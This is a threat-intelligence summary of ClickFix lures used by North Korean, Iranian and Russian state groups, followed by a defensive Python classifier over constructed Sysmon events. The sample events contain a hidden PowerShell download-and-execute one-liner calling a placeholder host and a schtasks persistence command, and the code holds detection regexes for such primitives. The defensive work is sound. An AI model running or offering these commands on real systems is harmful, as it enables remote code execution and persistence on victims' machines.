Full Report
ClickFix attacks are being increasingly adopted by threat actors of all levels, with researchers now seeing multiple advanced persistent threat (APT) groups from North Korea, Iran, and Russia utilizing the tactic to breach networks. [...]
Analysis Summary
# Threat Actor: State-Sponsored Hackers (General Trend/ClickFix Adopters)
## Attribution & Identity
The article details the adoption of the "ClickFix" social engineering tactic by multiple, distinct state-sponsored threat actors, including:
* **DPRK Hackers** (North Korean state-sponsored activity; the article does not name a specific group, and a link to Kimsuky is only inferred from the targeting pattern)
* **MuddyWater** (Iran-aligned group)
* **UNK_RemoteRogue** (referred to as a Russian threat group)
* **APT28** (GRU unit, associated with Russian intelligence)
## Activity Summary
The actors exhibited activity between October 2024 and February 2025, leveraging the ClickFix tactic to trick victims into manually executing PowerShell commands.
* **DPRK Hackers (Jan–Feb 2025):** Targeted think tanks focused on North Korea policy using spoofed Japanese diplomat emails. Victims were tricked into running a PowerShell command found in a malicious PDF link to establish persistence and download QuasarRAT.
* **MuddyWater (Mid-Nov 2024):** Targeted 39 organizations in the Middle East using emails disguised as Microsoft security alerts demanding immediate critical updates, leading to deployment of their RMM tool, 'Level.'
* **UNK_RemoteRogue (Dec 2024):** Targeted organizations related to a major arms manufacturer. Emails spoofed Microsoft Office and led to a fake Word document landing page with instructions in Russian and a YouTube tutorial, which had the victim run PowerShell that connected to an Empire C2 server.
* **APT28 (As early as Oct 2024):** Used phishing emails mimicking Google Spreadsheets, complete with a reCAPTCHA step and PowerShell execution instructions via pop-up, resulting in SSH tunnel setup and Metasploit launch.
## Tactics, Techniques & Procedures
The overarching TTP highlighted is the use of **ClickFix**: convincing victims to manually copy and paste commands (often PowerShell) into a terminal.
* **Vishing/Spearphishing:** Used emails spoofed as Japanese diplomats, Microsoft security alerts, Microsoft Office documents, or Google Spreadsheets.
* **Execution of Malicious Scripts:** The manually executed PowerShell commands fetched and ran secondary scripts.
* **Persistence:** Establishing persistence via scheduled tasks (DPRK).
* **Exfiltration/Espionage:** Use of RMM tools and RATs.
* **Command and Control (C2):** Use of Empire C2 framework.
* **Lateral Movement/Access:** Setting up SSH tunnels.
* **Evasion/Diversion:** Displaying decoy information (e.g., decoy PDF) to the victim after execution.
* **MITRE ATT&CK IDs (Inferred from tools/actions):** T1059.001 (PowerShell), T1547.001 (Registry Run Keys/Startup Folder/Scheduled Tasks).
## Targeting
* **Sectors:** Think tanks (North Korea policy), Organizations in the Middle East, Organizations related to a major arms manufacturer.
* **Geography:** Middle East, Targets associated with North Korea policy (implied international/US-based think tanks).
* **Victims:** Think tanks focused on North Korea-related policy; 39 unnamed organizations in the Middle East; Two organizations closely related to a major arms manufacturer.
## Tools & Infrastructure
* **Malware families used:** QuasarRAT, 'Level' (RMM tool), Metasploit.
* **Infrastructure (C2, domains, IPs):** Empire command-and-control (C2) framework, hosted on a server the UNK_RemoteRogue PowerShell stage connected to. No domains or IP addresses are listed in the summary.
## Implications
The widespread adoption of the ClickFix tactic across state-sponsored actors from different geopolitical alignments (North Korea, Russia, Iran) indicates that this method is currently highly effective due to low user awareness regarding unsolicited command execution, especially when administrator privileges are involved. This suggests a high risk of initial access and subsequent espionage via seemingly benign, multi-step social engineering lures.
## Mitigations
* Users must never execute commands they do not fully understand or copy directly from external or unsolicited online sources, particularly if those commands require administrator privileges.
* Implement application control and integrity checks to restrict the execution of unsigned PowerShell scripts or execution from non-standard directories.
* Increase user awareness training specifically regarding the ClickFix social engineering vector, focusing on deceptive presentation layers (fake security alerts, official-looking documents).
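The TTPs above (a user-pasted PowerShell one-liner that fetches a second stage, followed by scheduled-task persistence in a user-writable path) can be hunted for in process-creation telemetry. The following is an added example, not code from the article or any vendor: it runs a simple ClickFix classifier over constructed Sysmon-style events. It assumes the event fields `parent`, `image` and `cmd`, that Run-dialog and Start-menu launches show `explorer.exe` as the parent, and uses `example.invalid` as a placeholder URL.

```python
import json
import re
# Constructed Sysmon-style process-creation events (JSON lines), not real telemetry:
# event 1 models a pasted ClickFix one-liner, event 2 its follow-on scheduled task, 3 and 4 are benign.
SAMPLE_EVENTS = r'''
{"ts":"2025-01-15T09:12:03Z","host":"WS01","user":"alice","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell -w hidden -nop -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/fix.ps1')\""}
{"ts":"2025-01-15T09:12:05Z","host":"WS01","user":"alice","parent":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","image":"C:\\Windows\\System32\\schtasks.exe","cmd":"schtasks /create /sc minute /mo 5 /tn Updater /tr C:\\Users\\alice\\AppData\\Roaming\\u.exe"}
{"ts":"2025-01-15T10:01:00Z","host":"WS02","user":"bob","parent":"C:\\Windows\\System32\\svchost.exe","image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","cmd":"powershell.exe -ExecutionPolicy Bypass -File C:\\ProgramData\\Inventory\\collect.ps1"}
{"ts":"2025-01-15T10:30:00Z","host":"WS03","user":"carol","parent":"C:\\Windows\\explorer.exe","image":"C:\\Windows\\System32\\notepad.exe","cmd":"notepad.exe notes.txt"}
'''
# Parents that suggest a human typed or pasted the command (assumption: explorer.exe for Run dialog/Start menu).
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Download-and-execute primitives typical of the pasted one-liner.
FETCH_EXEC = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\bcurl\b|"
                        r"invoke-expression|\biex\b|-enc(odedcommand)?\b|frombase64string", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden|-nop\b|-noprofile\b", re.I)
USER_WRITABLE = re.compile(r"\\users\\|\\appdata\\|\\temp\\", re.I)

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify(ev):
    """Return the reasons an event looks ClickFix-related; an empty list means not flagged."""
    image, parent, cmd = basename(ev["image"]), basename(ev["parent"]), ev["cmd"]
    reasons = []
    # Alert only when an interactive launch also fetches and runs remote content;
    # a hidden window or -nop alone is common in legitimate automation.
    if image in POWERSHELL and parent in INTERACTIVE_PARENTS and FETCH_EXEC.search(cmd):
        reasons.append(f"PowerShell launched from {parent} fetches and executes remote content")
        if HIDDEN.search(cmd):
            reasons.append("window hidden or profile suppressed")
    elif image == "schtasks.exe" and "/create" in cmd.lower() and parent in POWERSHELL:
        reasons.append("scheduled task created by PowerShell (persistence)")
        if USER_WRITABLE.search(cmd):
            reasons.append("task action points into a user-writable directory")
    return reasons

def scan(jsonl):
    """Parse JSON-lines events; return (ts, host, user, reasons) for each flagged event."""
    hits = []
    for line in jsonl.strip().splitlines():
        ev = json.loads(line)
        if reasons := classify(ev):
            hits.append((ev["ts"], ev["host"], ev["user"], reasons))
    return hits

if __name__ == "__main__":
    for ts, host, user, reasons in scan(SAMPLE_EVENTS):
        print(f"{ts} {host} {user}: {'; '.join(reasons)}")
```

The svchost-launched script in event 3 is deliberately left unflagged: the interactive-parent condition is what separates a pasted lure from scheduled automation, and application control (the second mitigation above) is the complementary preventive layer.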